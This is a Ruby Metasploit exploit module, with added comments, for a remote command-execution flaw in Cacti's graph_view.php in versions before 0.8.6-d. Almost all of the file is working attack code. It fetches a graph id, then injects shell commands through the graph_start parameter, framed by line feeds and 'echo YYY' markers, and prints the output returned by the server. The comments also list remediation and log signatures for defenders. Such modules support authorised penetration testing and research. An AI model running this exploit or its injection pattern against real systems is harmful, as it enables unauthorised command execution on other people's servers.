GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/unix/webapp/cacti_graphimage_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit module for the command-execution flaw in Raxnet Cacti's
# graph_view.php (OSVDB 17539, BID 14042).
#
# The module issues two HTTP GET requests against the configured URI:
#   1. `action=list`, to read a `local_graph_id` value out of the response body;
#   2. the same script with that id and a `graph_start` value shaped as shell
#      command lines, then looks for the "YYY" markers in the response.
#
# Defender notes:
#   * Per the module description, every Cacti release before 0.8.6-d is
#     affected; upgrading past that release is the remediation.
#   * The second request carries a `graph_start` query value that starts and
#     ends with a line feed and contains ';' separators and the literal marker
#     "YYY". Any of these in web-server or proxy logs for graph_view.php is a
#     strong signal, since the parameter is presumably numeric in normal use
#     (TODO confirm against the Cacti source).
#   * 'Privileged' is false: commands run with the web server's privileges.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient

  # Registers the module metadata and the single user-facing option (`URI`).
  #
  # @param info [Hash] metadata overrides merged through `update_info`
  def initialize(info = {})
    metadata = update_info(
      info,
      'Name' => 'Cacti graph_view.php Remote Command Execution',
      'Description' => %q{
        This module exploits an arbitrary command execution vulnerability in the
        Raxnet Cacti 'graph_view.php' script. All versions of Raxnet Cacti prior to
        0.8.6-d are vulnerable.
      },
      'Author' => [ 'David Maciejak <david.maciejak[at]kyxar.fr>', 'hdm' ],
      'License' => MSF_LICENSE,
      'References' => [
        [ 'OSVDB', '17539' ],
        [ 'BID', '14042' ],
      ],
      'Privileged' => false,
      # Command payloads only, limited to 512 bytes, no NOP padding.
      'Payload' => {
        'DisableNops' => true,
        'Space' => 512,
        'Compat' => {
          'PayloadType' => 'cmd',
          'RequiredCmd' => 'generic perl ruby python telnet',
        }
      },
      'Platform' => 'unix',
      'Arch' => ARCH_CMD,
      'Targets' => [[ 'Automatic', {}]],
      'DisclosureDate' => '2005-01-15',
      'DefaultTarget' => 0,
      # Reliability, stability and side effects are all declared as unknown,
      # i.e. the impact of a run on the target host has not been characterised.
      'Notes' => {
        'Reliability' => UNKNOWN_RELIABILITY,
        'Stability' => UNKNOWN_STABILITY,
        'SideEffects' => UNKNOWN_SIDE_EFFECTS
      }
    )
    super(metadata)

    register_options(
      [
        OptString.new('URI', [true, "The full URI path to graph_view.php", "/cacti/graph_view.php"]),
      ]
    )
  end

  # Runs the two-request sequence described on the class and prints whatever
  # the server returned between the "YYY" markers.
  #
  # Returns early (after printing a message) when the listing request gets no
  # response or no `local_graph_id` can be found in the listing body.
  def exploit
    graph_view_path = normalize_uri(datastore['URI'])

    # Request 1: obtain a valid image ID from the graph listing (10 s timeout).
    listing = send_request_cgi(
      {
        'uri' => graph_view_path,
        'vars_get' => { 'action' => 'list' }
      },
      10
    )

    unless listing
      print_error("The server gave no response")
      return
    end

    graph_id = listing.body.match(/local_graph_id=(.*?)&/)
    unless graph_id
      print_error("Could not locate a valid image ID")
      return
    end

    # Request 2: trigger the command execution bug (25 s timeout). The value is
    # framed by line feeds and brackets the payload with `echo YYY` so that the
    # output can be located in the response body.
    graph_start = "\necho YYY;#{payload.encoded};echo YYY;echo\n"
    res = send_request_cgi(
      {
        'uri' => graph_view_path,
        'vars_get' => {
          'local_graph_id' => graph_id[1],
          'graph_start' => graph_start
        }
      },
      25
    )

    return print_status("No response from the server") unless res

    print_status("The server returned: #{res.code} #{res.message}")
    print("")

    # No marker pair in the body means the echoed output never came back.
    output = res.body.match(/YYY(.*)YYY/)
    if output
      print_status("Command output from the server:")
      print(output[1])
    else
      print_status("This server may not be vulnerable")
    end
  end
end